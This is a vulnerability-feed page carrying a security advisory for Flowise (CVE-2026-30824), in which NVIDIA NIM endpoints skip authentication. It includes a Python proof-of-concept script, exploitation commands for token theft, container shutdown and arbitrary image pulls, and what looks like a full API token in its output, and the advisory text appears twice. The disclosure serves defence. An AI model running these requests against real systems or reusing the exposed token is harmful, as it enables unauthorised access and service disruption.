Monitor vulnerabilities like this one.
Sign up free to get alerted when software you use is affected.
7.7
Unauthenticated access to NVIDIA NIM endpoints
GHSA-5f53-522j-j454
CVE-2026-30824
GHSA-5f53-522j-j454
Summary
Unauthenticated access allows hackers to get sensitive data, consume resources, or even take control of your system. This issue affects the NVIDIA NIM router and related endpoints. Update your software to ensure authentication is properly configured to prevent unauthorized access.
What to do
- Update flowise to version 3.0.13.
Affected software
| Vendor | Product | Affected versions | Fix available |
|---|---|---|---|
| – | flowise | <= 3.0.12 | 3.0.13 |
| – | flowise | <= 3.0.13 | 3.0.13 |
Original title
Flowise Missing Authentication on NVIDIA NIM Endpoints
Original description
# Missing Authentication on NVIDIA NIM Endpoints
## Summary
The NVIDIA NIM router (`/api/v1/nvidia-nim/*`) is whitelisted in the global authentication middleware, allowing unauthenticated access to privileged container management and token generation endpoints.
## Vulnerability Details
| Field | Value |
|-------|-------|
| CWE | CWE-306: Missing Authentication for Critical Function |
| Affected File | `packages/server/src/utils/constants.ts` |
| Affected Line | Line 20 (`'/api/v1/nvidia-nim'` in `WHITELIST_URLS`) |
| CVSS 3.1 | 8.6 (High) |
## Root Cause
In `packages/server/src/utils/constants.ts`, the NVIDIA NIM route is added to the authentication whitelist:
```typescript
export const WHITELIST_URLS = [
// ... other URLs
'/api/v1/nvidia-nim', // Line 20 - bypasses JWT/API-key validation
// ...
]
```
This causes the global auth middleware to skip authentication checks for all endpoints under `/api/v1/nvidia-nim/*`. None of the controller actions in `packages/server/src/controllers/nvidia-nim/index.ts` perform their own authentication checks.
## Affected Endpoints
| Method | Endpoint | Risk |
|--------|----------|------|
| GET | `/api/v1/nvidia-nim/get-token` | Leaks valid NVIDIA API token |
| GET | `/api/v1/nvidia-nim/preload` | Resource consumption |
| GET | `/api/v1/nvidia-nim/download-installer` | Resource consumption |
| GET | `/api/v1/nvidia-nim/list-running-containers` | Information disclosure |
| POST | `/api/v1/nvidia-nim/pull-image` | Arbitrary image pull |
| POST | `/api/v1/nvidia-nim/start-container` | Arbitrary container start |
| POST | `/api/v1/nvidia-nim/stop-container` | Denial of Service |
| POST | `/api/v1/nvidia-nim/get-image` | Information disclosure |
| POST | `/api/v1/nvidia-nim/get-container` | Information disclosure |
## Impact
### 1. NVIDIA API Token Leakage
The `/get-token` endpoint returns a valid NVIDIA API token without authentication. This token grants access to NVIDIA's inference API and can list 170+ LLM models.
**Token obtained:**
```json
{
"access_token": "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",
"token_type": "Bearer",
"expires_in": 3600
}
```
**Token validation:**
```bash
curl -H "Authorization: Bearer nvapi-GT-..." https://integrate.api.nvidia.com/v1/models
# Returns list of 170+ available models
```
### 2. Container Runtime Manipulation
On systems with Docker/NIM installed, an unauthenticated attacker can:
- List running containers (reconnaissance)
- Stop containers (Denial of Service)
- Start containers with arbitrary images
- Pull arbitrary Docker images (resource consumption, potential malicious images)
## Proof of Concept
### poc.py
```python
#!/usr/bin/env python3
"""
POC: Privileged NVIDIA NIM endpoints are unauthenticated
Usage:
python poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/get-token
"""
import argparse
import urllib.request
import urllib.error
def main():
ap = argparse.ArgumentParser()
ap.add_argument("--target", required=True, help="Base URL, e.g. http://host:port")
ap.add_argument("--path", required=True, help="NIM endpoint path")
ap.add_argument("--method", default="GET", choices=["GET", "POST"])
ap.add_argument("--data", default="", help="Raw request body for POST")
args = ap.parse_args()
url = args.target.rstrip("/") + "/" + args.path.lstrip("/")
body = args.data.encode("utf-8") if args.method == "POST" else None
req = urllib.request.Request(
url,
data=body,
method=args.method,
headers={"Content-Type": "application/json"} if body else {},
)
try:
with urllib.request.urlopen(req, timeout=10) as r:
print(r.read().decode("utf-8", errors="replace"))
except urllib.error.HTTPError as e:
print(e.read().decode("utf-8", errors="replace"))
if __name__ == "__main__":
main()
```
<img width="1581" height="595" alt="screenshot" src="https://github.com/user-attachments/assets/85351a88-64ce-4e2c-8e67-98f217fcf989" />
### Exploitation Steps
```bash
# 1. Obtain NVIDIA API token (no authentication required)
python poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/get-token
# 2. List running containers
python poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/list-running-containers
# 3. Stop a container (DoS)
python poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/stop-container \
--method POST --data '{"containerId":"<target_id>"}'
# 4. Pull arbitrary image
python poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/pull-image \
--method POST --data '{"imageTag":"malicious/image","apiKey":"any"}'
```
### Evidence
**Token retrieval without authentication:**
```
$ python poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/get-token
{"access_token":"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","token_type":"Bearer","refresh_token":null,"expires_in":3600,"id_token":null}
```
**Token grants access to NVIDIA API:**
```
$ curl -H "Authorization: Bearer nvapi-GT-..." https://integrate.api.nvidia.com/v1/models
{"object":"list","data":[{"id":"01-ai/yi-large",...},{"id":"meta/llama-3.1-405b-instruct",...},...]}
```
**Container endpoints return 500 (not 401) proving auth bypass:**
```
$ python poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/list-running-containers
{"statusCode":500,"success":false,"message":"Container runtime client not available","stack":{}}
```
## References
- [CWE-306: Missing Authentication for Critical Function](https://cwe.mitre.org/data/definitions/306.html)
- [OWASP API Security Top 10 - API2:2023 Broken Authentication](https://owasp.org/API-Security/editions/2023/en/0xa2-broken-authentication/)
## Summary
The NVIDIA NIM router (`/api/v1/nvidia-nim/*`) is whitelisted in the global authentication middleware, allowing unauthenticated access to privileged container management and token generation endpoints.
## Vulnerability Details
| Field | Value |
|-------|-------|
| CWE | CWE-306: Missing Authentication for Critical Function |
| Affected File | `packages/server/src/utils/constants.ts` |
| Affected Line | Line 20 (`'/api/v1/nvidia-nim'` in `WHITELIST_URLS`) |
| CVSS 3.1 | 8.6 (High) |
## Root Cause
In `packages/server/src/utils/constants.ts`, the NVIDIA NIM route is added to the authentication whitelist:
```typescript
export const WHITELIST_URLS = [
// ... other URLs
'/api/v1/nvidia-nim', // Line 20 - bypasses JWT/API-key validation
// ...
]
```
This causes the global auth middleware to skip authentication checks for all endpoints under `/api/v1/nvidia-nim/*`. None of the controller actions in `packages/server/src/controllers/nvidia-nim/index.ts` perform their own authentication checks.
## Affected Endpoints
| Method | Endpoint | Risk |
|--------|----------|------|
| GET | `/api/v1/nvidia-nim/get-token` | Leaks valid NVIDIA API token |
| GET | `/api/v1/nvidia-nim/preload` | Resource consumption |
| GET | `/api/v1/nvidia-nim/download-installer` | Resource consumption |
| GET | `/api/v1/nvidia-nim/list-running-containers` | Information disclosure |
| POST | `/api/v1/nvidia-nim/pull-image` | Arbitrary image pull |
| POST | `/api/v1/nvidia-nim/start-container` | Arbitrary container start |
| POST | `/api/v1/nvidia-nim/stop-container` | Denial of Service |
| POST | `/api/v1/nvidia-nim/get-image` | Information disclosure |
| POST | `/api/v1/nvidia-nim/get-container` | Information disclosure |
## Impact
### 1. NVIDIA API Token Leakage
The `/get-token` endpoint returns a valid NVIDIA API token without authentication. This token grants access to NVIDIA's inference API and can list 170+ LLM models.
**Token obtained:**
```json
{
"access_token": "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",
"token_type": "Bearer",
"expires_in": 3600
}
```
**Token validation:**
```bash
curl -H "Authorization: Bearer nvapi-GT-..." https://integrate.api.nvidia.com/v1/models
# Returns list of 170+ available models
```
### 2. Container Runtime Manipulation
On systems with Docker/NIM installed, an unauthenticated attacker can:
- List running containers (reconnaissance)
- Stop containers (Denial of Service)
- Start containers with arbitrary images
- Pull arbitrary Docker images (resource consumption, potential malicious images)
## Proof of Concept
### poc.py
```python
#!/usr/bin/env python3
"""
POC: Privileged NVIDIA NIM endpoints are unauthenticated
Usage:
python poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/get-token
"""
import argparse
import urllib.request
import urllib.error
def main():
ap = argparse.ArgumentParser()
ap.add_argument("--target", required=True, help="Base URL, e.g. http://host:port")
ap.add_argument("--path", required=True, help="NIM endpoint path")
ap.add_argument("--method", default="GET", choices=["GET", "POST"])
ap.add_argument("--data", default="", help="Raw request body for POST")
args = ap.parse_args()
url = args.target.rstrip("/") + "/" + args.path.lstrip("/")
body = args.data.encode("utf-8") if args.method == "POST" else None
req = urllib.request.Request(
url,
data=body,
method=args.method,
headers={"Content-Type": "application/json"} if body else {},
)
try:
with urllib.request.urlopen(req, timeout=10) as r:
print(r.read().decode("utf-8", errors="replace"))
except urllib.error.HTTPError as e:
print(e.read().decode("utf-8", errors="replace"))
if __name__ == "__main__":
main()
```
<img width="1581" height="595" alt="screenshot" src="https://github.com/user-attachments/assets/85351a88-64ce-4e2c-8e67-98f217fcf989" />
### Exploitation Steps
```bash
# 1. Obtain NVIDIA API token (no authentication required)
python poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/get-token
# 2. List running containers
python poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/list-running-containers
# 3. Stop a container (DoS)
python poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/stop-container \
--method POST --data '{"containerId":"<target_id>"}'
# 4. Pull arbitrary image
python poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/pull-image \
--method POST --data '{"imageTag":"malicious/image","apiKey":"any"}'
```
### Evidence
**Token retrieval without authentication:**
```
$ python poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/get-token
{"access_token":"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","token_type":"Bearer","refresh_token":null,"expires_in":3600,"id_token":null}
```
**Token grants access to NVIDIA API:**
```
$ curl -H "Authorization: Bearer nvapi-GT-..." https://integrate.api.nvidia.com/v1/models
{"object":"list","data":[{"id":"01-ai/yi-large",...},{"id":"meta/llama-3.1-405b-instruct",...},...]}
```
**Container endpoints return 500 (not 401) proving auth bypass:**
```
$ python poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/list-running-containers
{"statusCode":500,"success":false,"message":"Container runtime client not available","stack":{}}
```
## References
- [CWE-306: Missing Authentication for Critical Function](https://cwe.mitre.org/data/definitions/306.html)
- [OWASP API Security Top 10 - API2:2023 Broken Authentication](https://owasp.org/API-Security/editions/2023/en/0xa2-broken-authentication/)
ghsa CVSS4.0
7.7
Vulnerability type
CWE-306
Missing Authentication for Critical Function
Published: 6 Mar 2026 · Updated: 13 Mar 2026 · First seen: 6 Mar 2026